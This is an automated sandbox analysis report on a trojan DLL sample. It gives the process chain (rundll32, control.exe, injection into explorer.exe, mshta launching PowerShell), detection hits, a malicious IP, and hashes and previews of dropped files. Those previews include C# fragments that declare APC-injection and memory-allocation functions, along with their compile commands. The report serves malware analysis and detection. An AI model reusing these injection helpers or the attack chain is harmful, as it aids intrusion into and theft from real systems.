                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001B.00000000.605882278.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.613116153.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.558725783.000000000081C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001B.00000000.558386775.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.584316532.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.585179509.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: explorer.exe, 0000001B.00000000.585179509.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.573585959.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.560028015.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                      Source: explorer.exe, 0000001B.00000000.585179509.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.573585959.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.560028015.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00EF3365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00EF76BB GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00EF3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008F81F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00EF6D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information

                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR

                      [MITRE ATT&CK matrix; columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact]

                      [Behavior graph: ID: 617386, Sample: 626a97fea05c8.pdf.dll, Startdate: 28/04/2022, Architecture: WINDOWS, Score: 100. Process chains shown: loaddll32.exe -> cmd.exe -> rundll32.exe -> control.exe -> explorer.exe (injected) -> cmd.exe -> PING.EXE; mshta.exe -> powershell.exe -> csc.exe -> cvtres.exe.]

                      Source | Detection | Scanner | Label | Link
                      626a97fea05c8.pdf.dll | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link | Download
                      4.2.rundll32.exe.ef0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293 | | Download File
                      No Antivirus matches
                      No contacted domains info
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      94.140.115.8 | unknown | Latvia | | 43513 | NANO-ASLV | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:617386
                      Start date and time: 2022-04-28 15:46:37 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 20s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:626a97fea05c8.pdf.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:31
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@24/19@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 19.1% (good quality ratio 18.3%)
                      • Quality average: 82.2%
                      • Quality standard deviation: 27%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 5140 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      Time | Type | Description
                      15:47:50 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
                      15:48:54 | API Interceptor | 28x Sleep call for process: powershell.exe modified
                      No context
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):11606
                      Entropy (8bit):4.883977562702998
                      Encrypted:false
                      SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                      MD5:243581397F734487BD471C04FB57EA44
                      SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                      SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                      SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                      Malicious:false
                      Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.9260988789684415
                      Encrypted:false
                      SSDEEP:3:Nlllulb/lj:NllUb/l
                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                      Malicious:false
                      Preview:@...e................................................@..........
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                      Category:dropped
                      Size (bytes):1336
                      Entropy (8bit):3.979625188103071
                      Encrypted:false
                      SSDEEP:24:Hegm9nacV8xdaHahKdNwI+ycuZhNMbakSVUPNnq9Sd:NYQKdm1ulMba3V0q9C
                      MD5:3CE142767A9B97FD635A96E92F0D2370
                      SHA1:8E1053965C0BA510CC8F994E49BF8C228A95DA78
                      SHA-256:799E2AE5418FF420E945FB8C0DBDD86FAA5309FC215058F3AB9904CC929A9B5F
                      SHA-512:848F8635A70C773462C9336B7C03F6F2CE0481A9FFA2A7AF37C38D7D982EA9D4FD847F9C76B07AD20B2AC8D4F94B9A318E4096351A1C5B237E4D74DCE544DEDE
                      Malicious:false
                      Preview:L.....kb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........V....c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP..................F..l_..Y.. ..u...........7.......C:\Users\user\AppData\Local\Temp\RES4ECA.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.i.r.2.n.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):3.976961351921599
                      Encrypted:false
                      SSDEEP:24:H6gzW91PaaaHNhKdNwI+ycuZhNMrDakStrMPNnq92d:a2P7Kdm1ulMrDa3trcq9G
                      MD5:4BE202B8FFD9174BDEF52EC7E55C7906
                      SHA1:EC109D99A4D8813FF783195C87B7491208CF833D
                      SHA-256:880A8FB061DED10C23BBBC483FB6100CDC51FA28F37D4005A4EC26FE7473B120
                      SHA-512:CCEE6F17E704887F3B54FFFB247E5407D5F6C58C5B5B58F8D5D3F355093178083ECAF081256C4DB60E4E2B7BFEE7123A879E8AE6A19FBD882C6EE236A0D839C1
                      Malicious:false
                      Preview:L.....kb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP..................k...Oo+H`Bx2...........7.......C:\Users\user\AppData\Local\Temp\RES6B2B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.x.4.3.i.m.o.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0939256831440654
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWbak7YnqqVUPN5Dlq5J:+RI+ycuZhNMbakSVUPNnqX
                      MD5:CF46BD1C6C5FB90159FFE520B19275E8
                      SHA1:DB4BDD0FDA0C8D1F12E9162863B57A7477F92E4A
                      SHA-256:9F41CE2E8F26B112537D43334C2C9CC8F0D14C94654072FC626E42EA7B0CA275
                      SHA-512:F4D926FEE8DB667423B7FB7D90AE53BE0723925961E1C0326E1400FC0B86659A7ED1580D396A8EC2FB4524D01D1215F221CB58AC36C2A217D703ACD0A161CBC6
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.y.i.r.2.n.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.y.i.r.2.n.w.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):375
                      Entropy (8bit):5.211111739770197
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fvfVFn0zxs7+AEszIN723fvfVtBH:p37Lvkmb6K2aN6WZETaNtBH
                      MD5:6BF76C5DB89716E62BE656A1DDC2F3D3
                      SHA1:12F9900BC23C58B611E2E191853D999519EB10D0
                      SHA-256:27198683AF1F6DF27E2092AC9392DDEE2AEFD8E222CBA143853884A635AC19E9
                      SHA-512:301690B27687327CE67B74BB675E9BD96EE7182E7B364230B48499AAAD69F8C17E5221A2A97E6B1558DC704CD5F14DF44C2C638D9F81A077BCAB16167AF0747E
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.612675918078629
                      Encrypted:false
                      SSDEEP:24:etGSe8OmU0t3lm85xWAseO4zffQ64pfUPtkZfK1WcVUWI+ycuZhNMbakSVUPNnq:6YXQ3r5xNO2fQfUuJK1J31ulMba3V0q
                      MD5:68E8A0766C7D2D95BF16051A2936E45D
                      SHA1:D46D386399E735A5679DA3751B03B47A335FA015
                      SHA-256:5EAABC93330EAB66786C30CB04CBE6E0EA65ECF27ADA1046E73F54DA3DB9BB7D
                      SHA-512:D8AB480F92EB1CD7F00EE3B91F571A6448640792ACD4ED01944B1C638F118FAE04A3847FF9B47A7762234BB424A3E63715696D55022A989B455E3D1CED5DC88E
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):872
                      Entropy (8bit):5.301600433637405
                      Encrypted:false
                      SSDEEP:24:AId3ka6K2a1ETa0KaM5DqBVKVrdFAMBJTH:Akka6C1E+0KxDcVKdBJj
                      MD5:8285E9CFFC7EA99FF8518FC6A0161E22
                      SHA1:85AA835E715D954EAA4E5562EA3445BE8CEA66EA
                      SHA-256:2644B6BD5CDAD33BFBD9663889FF5341F7D53BDD494A789AE362FFC5D1896D88
                      SHA-512:94845320BF76AEDDB1896D70AC5592C73C81FC0E9191E2683F121D1CC89BD69F76011A2B95FDB7979072C71121D5E6588D007AEC19A044A1DB8795AF07EB7ABA
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.101326691421469
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGWSeqak7YnqqtWSebPN5Dlq5J:+RI+ycuZhNMrDakStrMPNnqX
                      MD5:A918BB6B1F9E004F6F2B4860427832EE
                      SHA1:B9F22EAC7D576F4D6CE38AD5BF43CF338025D6BE
                      SHA-256:86BA7BDC18FD38C38DAD600263BBE93A126B4E7EE408E7C0FA9A24A4F0D68871
                      SHA-512:01FBEB47C5447DD7B200B9411244923E8F7FC054F8FFB7DE37E37D7948713A073A66EB25265E9D022EA0F396D5642A760450993C5F14B31C1A1E09CF3A479899
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.x.4.3.i.m.o.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.x.4.3.i.m.o.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):375
                      Entropy (8bit):5.209435253328532
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fbbZNlJUzxs7+AEszIN723fbbZN9:p37Lvkmb6K2a3ZNAWZETa3ZN9
                      MD5:72EF573DBCB3842107940910BE495A4D
                      SHA1:6567A1D61AE2299D6004D7F7AE9E36D10C8AAE91
                      SHA-256:7476C3596E416ABBC227D46DD61C087BF4F0311354D4421F125EED23B853D023
                      SHA-512:528400D1E12D4CCBFE9E68708230A6F21036204ABB5A8513B6900D1C3656A13155C408ADC0ECEBD5C960FCFCB24500D5D8BEABFB21E822FFC46FF4BFDCA91DAB
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.592584166244639
                      Encrypted:false
                      SSDEEP:24:etGSX/u2Bg85z7xlfwZD6kgdWqtkZfS16XWI+ycuZhNMrDakStrMPNnq:6mYb5hFCD69WdJS16G1ulMrDa3trcq
                      MD5:D2F013A4FCAB1ED0A4E84B6A560A263D
                      SHA1:F4DADE0BDA352F9DA63491694364E93E1AE04B78
                      SHA-256:D1ACC2076ED115F9CC0E3F2E9E78D70341A59DB10C3F615064F9334D8A9DE5EE
                      SHA-512:7EED1FE7527C1A4BE6B51D70FDC263E8A83DEA01730E8CD61E2256BF0DF7A687D6FC4D840237DEE00BD3F4B6A27EDC86AD8C9CE6C0382AD143866681AFFF4F24
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):872
                      Entropy (8bit):5.304211217463544
                      Encrypted:false
                      SSDEEP:24:AId3ka6K2atETacKaM5DqBVKVrdFAMBJTH:Akka6CtE+cKxDcVKdBJj
                      MD5:65A1799FB3C9582C28E5ADC1D824EF07
                      SHA1:16A1FCDA2B884B1B7BC03EAC5158FDBF71E92AFA
                      SHA-256:ECDD48BFBDBC2317260CB1B7DB10A7B0448F48AF83C956E717F025B26257128A
                      SHA-512:EFD86B882FD38490C7562BB49DD2DF8ACF78CD27DB7234C7E2241565F899BB5E8DFDD7B5FEFE2BFD69A62D7E0213F9DD7CA16119BFB6198A0543F327782C5C78
                      Malicious:false
